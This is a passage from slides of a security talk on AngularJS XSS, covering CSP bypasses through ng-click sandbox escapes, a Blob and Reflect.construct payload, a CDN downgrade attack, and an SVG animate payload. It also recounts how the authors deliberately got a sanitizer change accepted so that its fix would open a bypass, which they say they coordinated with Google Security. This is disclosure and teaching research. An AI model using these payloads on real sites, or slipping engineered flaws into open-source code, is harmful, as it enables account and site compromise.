extensions and alike.
● Its compatibility with CSP is a strength and a
weakness at the same time.
● We are interested in the latter of course.
45. A3: Early CSP Bypasses
● The first spotted bypasses were trivial to say the
least. Just use Framework features.
● Take a website with strong CSP and older AngularJS.
● Find an injection.
● Don't do "onclick="alert(1)"
● But instead do "ng-click="$event.view.alert(1)".
● Because $event leaks window via view.
● This works until version 1.1.5.
47. A3: Fixes and new Bypasses
● Why not use the sandbox here as well?
● AngularJS started to prevent access to window and
other properties.
● So we would do it indirectly, abusing a
Chrome flaw, with the help of Blob.
● But for Blob we would need the “new” operator
and AngularJS doesn't parse that.
● So we need to resort to using ES6 and the brand
new Reflect API.
● This works until version 1.3.1 by the way.
● And latest Chrome supports ES6's Reflect
API! Yay :D
48. <?php
header('Content-Security-Policy: default-src 'self'
ajax.googleapis.com');
?><html ng-app ng-csp>
<head>
<meta charset="utf-8">
<script
src="//ajax.googleapis.com/ajax/libs/angularjs/1.3.1/angular.js"
></script>
</head>
<body>
<h1 ng-click="
$event.view.location.replace($event.view.URL.createObjectURL($event.
view.Reflect.construct( $event.view.Blob,
[['<script>alert(1)</script>'],{type:'text/html'}])))
">XSS</h1>
<!-- without CSP we can of course do this -->
<h1 ng-
click="$event.view.location.replace('javascript:alert(1)')">XSS</h1>
</body>
49. <!-- read from bottom to top -->
<h1 ng-click="
$event.view.location.replace( // 4. call location.replace
$event.view.URL.createObjectURL( // 3. create Blob URL
$event.view.Reflect.construct( // 2. get around “new”
$event.view.Blob,
[['<script>alert(1)</script>'],
{type:'text/html'}] // 1. build a Blob
)
)
);
">XSS</h1>
50. A3: Universal CSP Bypass
● There's another bypass they cannot easily fix.
● It works where applications use the Google CDN.
● And it relates to a collision check they
implemented. Only too late.
● Because it landed in 1.2.15 and newer.
● “WARNING: Tried to load angular more than once.”
● And essentially enables a downgrade attack.
● That will, if Google CDN is white-listed, universally
bypass CSP. Don't white-list that CDN.
● Just bring the old bypasses back!
54. A4: Attacking the Code-Base
● What does an attacker do if no exploitable bugs
can be found?
● Of course. We attack the project itself.
● And use the power of open source to introduce
changes that cause the bugs we want.
● And thereby get both praise for reporting a bug
and the desired exploit for free.
● We did that to AngularJS.
● Google Security knew in advance,
AngularJS did not.
55. A4: The Con-Setup
● We needed a subtle “bug” that upon being fixed would
raise a security issue.
● Or smuggle in a pull request that looks unsuspicious
enough to pass QA.
● The first option is unlikely, like a lottery win.
● The second option is a bit more risky, what if we get
detected?
● Well.
● We were lucky, that exact subtle “bug” existed
and it did in the $sanitizer component.
● Let's have a look!
56. A4: The Bug
// SVG attributes (without "id" and "name" attributes)
// https://wiki.whatwg.org/wiki/Sanitization_rules#svg_Attributes
var svgAttrs = makeMap('accent-height,accumulate,additive,alphabetic,arabic-form,ascent,' +
'attributeName,attributeType,baseProfile,bbox,begin,by,calcMode,cap-height,class,color,' +
'color-rendering,content,cx,cy,d,dx,dy,descent,display,dur,end,fill,fill-rule,font-family,' +
'font-size,font-stretch,font-style,font-variant,font-weight,from,fx,fy,g1,g2,glyph-name,' +
'gradientUnits,hanging,height,horiz-adv-x,horiz-origin-x,ideographic,k,keyPoints,' +
'keySplines,keyTimes,lang,marker-end,marker-mid,marker-start,markerHeight,markerUnits,' +
'markerWidth,mathematical,max,min,offset,opacity,orient,origin,overline-position,' +
'overline-thickness,panose-1,path,pathLength,points,preserveAspectRatio,r,refX,refY,' +
'repeatCount,repeatDur,requiredExtensions,requiredFeatures,restart,rotate,rx,ry,slope,stemh,' +
'stemv,stop-color,stop-opacity,strikethrough-position,strikethrough-thickness,stroke,' +
'stroke-dasharray,stroke-dashoffset,stroke-linecap,stroke-linejoin,stroke-miterlimit,' +
'stroke-opacity,stroke-width,systemLanguage,target,text-anchor,to,transform,type,u1,u2,' +
'underline-position,underline-thickness,unicode,unicode-range,units-per-em,values,version,' +
'viewBox,visibility,width,widths,x,x-height,x1,x2,xlink:actuate,xlink:arcrole,xlink:role,' +
'xlink:show,xlink:title,xlink:type,xml:base,xml:lang,xml:space,xmlns,xmlns:xlink,y,y1,y2,' +
'zoomAndPan');
Fun fact, those attributes were considered safe because of a
deprecated Wiki page from WHATWG:
https://wiki.whatwg.org/wiki/Sanitization_rules
57. A4: The Bug
angular.forEach(attrs, function(value, key) {
var lkey = angular.lowercase(key); // < here!
var isImage = (tag === 'img' && lkey === 'src') || (lkey === 'background');
if (validAttrs[lkey] === true &&
(uriAttrs[lkey] !== true || uriValidator(value, isImage))) {
out(' ');
out(key);
out('="');
out(encodeEntities(value));
out('"');
}
}
);
As we can see, the lowercasing ruins the test – and even valid
attributes cannot pass. What a coincidence, that this happens
exactly for dangerous attributes here! Thanks, SVG!
58. A4: The Execution
● So, if that specific behavior observed in
the sanitizer blocks a bypass...
● We need to file a bug to get it fixed!
● The bug. Not the bypass :)
● So we did that.
● And it got accepted!
59. A4: The Bypass
<svg>
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?">
<circle r="400"></circle>
<animate attributeName="xlink:href"
begin="0" from="javascript:alert(1)" to="&" />
</a>
</svg>
We use an animation to animate a link's href attribute from a
benign, over a dangerous to a harmless but invalid state,
causing the browser to jump back to the malicious state. Neat.
60. A4: The Aftermath
● We reported the issue to Google Security.
● They informed the AngularJS Team.
● Nothing happened for weeks.
● The next release came close. Danger!
● We pinged again.
● They finally fixed our bug.
● Phew :)
● Now, note that file contains a big comment warning
the developers.
61. /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Any commits to this file should be reviewed with security in mind. *
* Changes to this file can potentially create security vulnerabilities. *
* An approval from 2 Core members with history of modifying *
* this file is required. *
* *
* Does the change somehow allow for arbitrary javascript to be executed? *
* Or allows for someone to change the prototype of built-in objects? *
* Or gives undesired access to variables likes document or window? *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
62. And, in case you hate
us a bit for doing that
stunt...
65. A Quick Conclusion
● AngularJS does in fact extend the attack surface dramatically.
Older versions even more.
● Meanwhile, some things are done right. Others can almost
never be fixed again.
● Developers have to know pitfalls to avoid them.
● And we find MANY of these in penetration tests: MANY.
● And pitfalls often are unfairly hard to detect and avoid.
Especially when CSP is involved.
● Many sites still use older versions. Many.
● Open Source can be risky if the traction is high.
● Google's team already does well though.
● But Google could do better in helping developers.
66. The End
● Question? Comments?
● Thanks a lot!
● Shouts go out to
● Gareth McHeyes
● Jann Horn
● Mathias Karlsson
● Gábor Molnár
● David Ross
● Eduardo Vela
● The AngularJS team for so much XSS :D